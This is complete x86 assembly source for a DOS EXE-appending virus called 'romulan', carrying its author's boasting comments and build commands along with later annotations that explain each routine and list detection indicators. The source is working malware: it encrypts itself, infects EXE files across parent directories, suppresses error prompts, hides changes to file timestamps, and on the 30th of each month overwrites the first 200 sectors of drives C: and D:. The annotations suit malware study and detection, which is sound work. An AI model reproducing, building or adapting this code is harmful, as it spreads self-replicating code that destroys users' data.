
;------------------------

;romulan by death dealer


;666 in size
;direct action exe appending virus
;jumps directories
;if seconds are less then 15 then user gets rom basic!
;if day is 30th of any month, hard drives c: to d: die instantly!
;incredible encryption is invisible to all string and heuristics scanners!
;it is safe to infect files on floppy, however make sure it is not the 30th!
;tasm /m
;tlink /t
;------------------------
;look for my new mutation engine soon! no linking required!
;that means any fool can add it to their source!
;simply by running a com file!
;------------------------
;
;

; Single code segment assembled at offset 100h; every later data reference is
; made relative to BP/SI so the body can run from wherever it was appended.
code segment public 'code'


assume cs:code
org 100h

; Marker word. rapeexe stores it in the EXE header word at offset 10h of each
; file it modifies, and checkexe compares that same word to skip files that
; already carry it. For triage this makes the header word a file-level
; indicator.
id = 'ky'
; Limit that findfirst compares against the per-run `counter`.
maxfiles = 20

;-----------------------------------------------------------------------
; Entry stub and main flow (analysis notes).
;   1. Recover the load displacement (call/pop) into SI.
;   2. XOR-decode the region cloak_start..cloak_end in place.
;   3. Hook INT 24h, save the current directory, then run the file pass in
;      the current directory and in each parent reached through "..".
;   4. Run the date/time-gated routine rom_fuck.
;   5. Undo the hook and directory change, rebuild the host's SS:SP and
;      far-jump to the host's original entry point.
; The lines from `start` to `call cloak_uncloak` lie before cloak_start, so
; they are stored unencoded in every affected file.
;-----------------------------------------------------------------------
start:

virus:
call realthingbaby ; pushes the run-time address of the next instruction

realthingbaby:
nop
nop
nop
pop si ; si = run-time address of realthingbaby
sub si,offset realthingbaby ; si = run-time minus assemble-time displacement

call cloak_uncloak ; uncloak the virus first

cloak_start equ $ ; from here it is cloaked

mov bp,si ; bp carries the displacement for all later [bp+...] accesses

; Save the segment registers handed over by DOS; they are popped again just
; before control returns to the host.
push ds
push es
push cs
pop ds
push cs
pop es

; Copy 8 bytes (jmpsave2 + stacksave2) into jmpsave + stacksave. The "2"
; copies are filled by rapeexe from the header of the file being modified
; and travel inside the appended image.
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
movsw
; Use a private DTA for the file searches that follow.
lea dx,[bp+offset dta]
call set_dta

mov [bp+counter],byte ptr 0 ; per-run count of modified files


; INT 21h/35h: read the current INT 24h (critical error) vector into ES:BX
; and keep it so it can be restored later.
mov ax,3524h
int 21h
mov word ptr [bp+oldint24],bx
mov word ptr [bp+oldint24+2],es

; INT 21h/25h with AL still 24h: install the local int24 handler, which
; answers every critical error with AL=3 so no DOS error prompt is shown
; (for example on a write-protected diskette).
mov ah,25h
lea dx,[bp+offset int24]
int 21h

push cs
pop es ; ES was overwritten by the vector query above

; INT 21h/47h, DL=0: store the default drive's current directory in currentdir.
mov ah,47h
mov dl,0h
lea si,[bp+offset currentdir]
int 21h

; Search '*.exe' here, then change to "..". The loop repeats while the
; directory change succeeds (carry clear).
jumparound:
lea dx,[bp+offset exefilespec]
call findfirst

lea dx,[bp+offset directory]


mov ah,3bh ; change directory
int 21h
jnc jumparound

call rom_fuck ; date/time-gated routine, see its own notes

; Put the original INT 24h vector back (DS:DX loaded from oldint24).
mov ax,2524h
lds dx,[bp+offset oldint24]
int 21h

push cs
pop ds

; INT 21h/3Bh with the path saved earlier in currentdir.
lea dx,[bp+offset currentdir]


mov ah,3bh
int 21h

; Set the DTA to offset 80h; DS equals CS at this point.
mov dx,80h
call set_dta

pop es
pop ds

; Relocate the saved entry segment and stack segment: both were stored
; relative to the load image, which starts 10h paragraphs above the segment
; now in ES.
mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; no interrupts while SS:SP is inconsistent
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
; 0EAh is the far-JMP opcode; the dword jmpsave that follows is its operand,
; so execution continues at the host's original CS:IP.
db 0eah
jmpsave dd ?
stacksave dd ? ; low word = saved SP, high word = saved SS (see rapeexe)
jmpsave2 dd 0fff00000h ; value present before any file has been modified
stacksave2 dd ?

;-----------------------------------------------------------------------
; findfirst: enumerate files matching the pattern at DS:DX (set by the
; caller) and pass each match to `rape`.
; In:   dx = offset of an ASCIIZ file pattern, bp = displacement
; Uses: INT 21h/4Eh (find first) and 4Fh (find next); results land in the
;       DTA set up by the caller.
; The counter limit is tested once, on entry.
;-----------------------------------------------------------------------
findfirst:
cmp [bp+counter],maxfiles
ja quit ; counter above maxfiles: do nothing in this directory

mov ah,4eh
mov cx,7 ; attribute mask: also match read-only, hidden and system files

findnext:
int 21h
jc quit ; carry set: no (more) matches

call rape

mov ah,4fh ; continue the same search
jmp findnext

quit:
ret

;-----------------------------------------------------------------------
; rape: per-file routine called for every directory match (analysis notes).
; In: DTA filled by find first/next, bp = displacement.
; Steps visible below:
;   - read the first 1Ah bytes of the file (the EXE header fields used here)
;   - skip the file if the header word at 10h already equals `id`
;   - save the header's entry point (14h/16h) and stack (0Eh/10h)
;   - rewrite header fields 02h, 04h, 0Eh, 10h, 14h, 16h
;   - append eof-virus bytes of encoded body at end of file
;   - restore the file's original time, date and attributes
; Indicators on a modified file that follow from this: header word at 10h
; equals `id`; header SS equals header CS; entry point lies in the final
; eof-virus bytes of the file; length grew by eof-virus (the file header
; comment gives 666). Timestamp and attribute bits are put back, so they do
; not reveal the change.
;-----------------------------------------------------------------------
rape:
mov ax,3d00h ; AL=0: open read-only (opencunt reloads AH and keeps AL)
call opencunt

; Read 1Ah header bytes into `buffer`, then close the handle again.
mov ah,3fh
mov cx,1ah
lea dx,[bp+offset buffer]
int 21h

mov ah,3eh
int 21h

checkexe:
cmp word ptr [bp+buffer+10h],id ; marker already present?
jz quitrape
jmp rapeexe

quitrape:
ret

rapeexe:
; Header 14h/16h = initial IP/CS; kept in jmpsave2 for the return to host.
les ax,dword ptr [bp+buffer+14h]
mov word ptr [bp+jmpsave2],ax
mov word ptr [bp+jmpsave2+2],es

; Header 0Eh/10h = initial SS/SP; stored as SP (low word), SS (high word).
les ax,dword ptr [bp+buffer+0eh]


mov word ptr [bp+stacksave2],es
mov word ptr [bp+stacksave2+2],ax

; Header 08h = header size in paragraphs; shifted left by 4 to get bytes.
mov ax, word ptr [bp+buffer+8]


mov cl,4
shl ax,cl
xchg ax,bx ; bx = header size in bytes
; DTA offset 26 (1Ah) = file size; DX:AX = size, kept on the stack as well.
les ax,[bp+offset dta+26]
mov dx,es
push ax
push dx

; (file size - header size) / 16: quotient = paragraph of the file's end
; within the load image, remainder = offset inside that paragraph.
sub ax,bx
sbb dx,0
mov cx,10h
div cx

mov word ptr [bp+buffer+14h],dx ; new initial IP


mov word ptr [bp+buffer+16h],ax ; new initial CS

mov word ptr [bp+buffer+0eh],ax ; new initial SS (same value as CS)


mov word ptr [bp+buffer+10h],id ; marker goes into the initial SP field
pop dx
pop ax

; New length = old length + eof-virus, converted to the header's
; "pages of 512 bytes" (04h) and "bytes in last page" (02h) fields.
add ax,eof-virus
adc dx,0

mov cl,9
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax
and ah,1 ; ax = length modulo 512

mov word ptr [bp+buffer+4],dx


mov word ptr [bp+buffer+2],ax

push cs
pop es ; ES was used as a scratch register by the LES loads above

mov cx,1ah ; number of header bytes to write back

finishrape:
push cx
xor cx,cx ; CX=0: clear all attribute bits so the file can be opened for write
call attributes

mov al,2 ; open read/write
call opencunt

; Write the edited 1Ah header bytes at the start of the file.
mov ah,40h
lea dx,[bp+buffer]
pop cx
int 21h
jc closecunt ; write failed: skip the append, still restore metadata

mov al,02 ; seek origin = end of file
call move_fp

; Pick the XOR key from the seconds field of the DOS clock (INT 21h/2Ch,
; DH); zero is rejected, so an appended copy never uses key 0.
get_time:
mov ah,2ch
int 21h
cmp dh,0
je get_time
mov [bp+enc_value],dh

call cloak_rape ; encode, append, decode (see cloak_rape / move_begin)

inc [bp+counter]

closecunt:
; INT 21h/5701h: set the file's time and date back to the values the
; directory search returned (DTA 16h/18h).
mov ax,5701h
mov cx,word ptr [bp+dta+16h]
mov dx,word ptr [bp+dta+18h]
int 21h

mov ah,3eh ; close
int 21h

; Restore the original attribute byte from DTA 15h.
xor cx,cx
mov cl,byte ptr [bp+dta+15h]
call attributes

retn

;-----------------------------------------------------------------------
; rom_fuck / nuke_disk: date/time-gated destructive routine (analysis notes).
; Comments describe only what this listing shows:
;   - the seconds value is compared with 15 twice, and both conditional
;     jumps target phase_two, which is also the fall-through, so the
;     comparison does not change the path taken here;
;   - nuke_disk is reached by `call` from phase_two and again by
;     fall-through after that call returns;
;   - the disk writes depend only on the day-of-month test (DL == 30).
; INT 26h is the DOS absolute disk write service; AL selects the drive and
; CX the sector count. An ordinary application issuing INT 26h is a strong
; behavioural indicator.
;-----------------------------------------------------------------------
rom_fuck: ;the rom routine


int 21

mov ah,2ch ; INT 21h/2Ch: get time, DH = seconds
int 21h

cmp dh,15 ;are the seconds less then 15?


ja phase_two ;if not go to nuke_disk

cmp dh,15 ;are the seconds less then 15?


ja phase_two ;if not go to nuke_disk

phase_two:
call nuke_disk

nuke_disk:
mov ah,2ah ; INT 21h/2Ah: get date, DL = day of month
int 21h

cmp dl,30 ;is it the 30th of any month?


jne dont_do_shit ;if not then continue virus

mov al,2 ;the c: drive


mov cx,200 ;200 sectors starting at 0
cli ;no aborting :)
cwd ; DX is derived from the sign of AX; DX is the start-sector operand
int 026h ;smash the drive!
sti

mov al,3 ;the d: drive


mov cx,200 ;sectors 0-200
cli ;same
cwd
int 026h ;ditto
sti
dont_do_shit:
ret

; move_fp: INT 21h/42h seek with a zero offset (CX:DX = 0).
; In:  al = seek origin (the caller passes 2 = end of file), bx = file handle
; Out: whatever INT 21h/42h returns; not inspected by the caller shown here
move_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
retn

; set_dta: INT 21h/1Ah, set the disk transfer area to DS:DX.
; In: ds:dx = address of the new DTA
set_dta:
mov ah,1ah
int 21h
retn

; Open the file named in the current DTA entry (name field at DTA offset 30).
; In:  al = access mode (callers pass 0 = read-only or 2 = read/write)
; Out: bx = value returned in AX by INT 21h/3Dh (the handle on success);
;      the carry flag is not checked here
opencunt:
mov ah,3dh
lea dx,[bp+dta+30]
int 21h
xchg ax,bx
ret

; attributes: INT 21h/4301h, set the attributes of the file named in the
; current DTA entry.
; In: cx = attribute bits to set (0 clears read-only/hidden/system)
attributes:
mov ax,4301h
lea dx,[bp+dta+30]
int 21h
ret

; Replacement INT 24h (critical error) handler installed during the file
; pass. Returning AL=3 tells DOS to fail the call, so the user sees no
; error prompt when a write is refused.
int24:
mov al,3
iret

; Text and search constants. They sit between cloak_start and cloak_end, so
; in an appended copy they are XOR-encoded with enc_value and do not appear
; as plain strings in the file.
virus_name db 'putersmahz'
virus_man db 'kizz me azz dan snyder (violator)'
thanx_to db 'gretz to menace wc (hope this helpz)'

exefilespec db '*.exe',0 ; pattern handed to findfirst
directory db '..',0 ; target of the change-directory loop

; cloak_rape: copy the writer routine (move_begin..move_end) into `workarea`
; and run it from there. The writer lies inside the region that is encoded
; in memory while the body is written out, so it is executed from a copy
; placed after `eof`, outside that region.
; In: bx = open file handle positioned at end of file, bp = displacement
cloak_rape:
lea si,[bp+offset move_begin]
lea di,[bp+offset workarea]
mov cx,move_end-move_begin

move_jumparound:
movsb
loop move_jumparound
lea dx,[bp+offset workarea]
call dx
ret

; Writer routine; runs from its copy in `workarea` (see cloak_rape).
; cloak_end and cloak_uncloak mark the same address, so `call dx` with
; dx = cloak_end invokes the XOR routine: once to encode the region before
; the write and once to decode it again afterwards.
; In: bx = file handle, bp = displacement
move_begin equ $
mov si,bp ; cloak_uncloak takes the displacement in SI
push bx ; cloak_uncloak uses BX as its pointer
lea dx,[bp+offset cloak_end]
call dx
pop bx
; INT 21h/40h: write eof-virus bytes starting at `virus` to the file.
mov ah,40h
mov cx,eof-virus
lea dx,[bp+offset virus]
int 21h
push bx
lea dx,[bp+offset cloak_end]
call dx
pop bx
ret
move_end equ $

cloak_end equ $

; cloak_uncloak: XOR every byte of cloak_start..cloak_end with the single
; byte enc_value, in place. The same call encodes and decodes.
; In:    si = displacement
; Clobb: ah, bx, cx, flags
; Analysis note: this routine, enc_value and the entry stub before
; cloak_start all lie outside the encoded region, so their bytes are the
; same in every appended copy regardless of the key. The key is one byte
; taken from the clock's seconds field (see get_time).
cloak_uncloak:
lea bx,[si+cloak_start]
mov cx,cloak_end-cloak_start

cloak_jumparound:
mov ah,cs:[bx]
xor ah,[si+enc_value]
mov cs:[bx],ah
inc bx
loop cloak_jumparound
ret

; XOR key byte. It precedes `eof`, so it is written to the file unencoded as
; the last byte of the appended image. It is 00h in this listing and is set
; to a non-zero seconds value by get_time before each append.
enc_value db 00h

eof equ $ ; end of the image that move_begin writes (eof-virus bytes)

; Scratch storage after `eof`: used at run time only, not written to files.
counter db 0 ; files modified during this run
workarea db move_end-move_begin dup (?) ; run-time copy of the writer routine
currentdir db 64 dup (?) ; directory saved by INT 21h/47h
dta db 42 dup (?) ; private disk transfer area for the searches
buffer db 1ah dup (?) ; header bytes read from / written to each file
oldint24 dd ? ; original INT 24h vector

eov equ $

code ends
end start
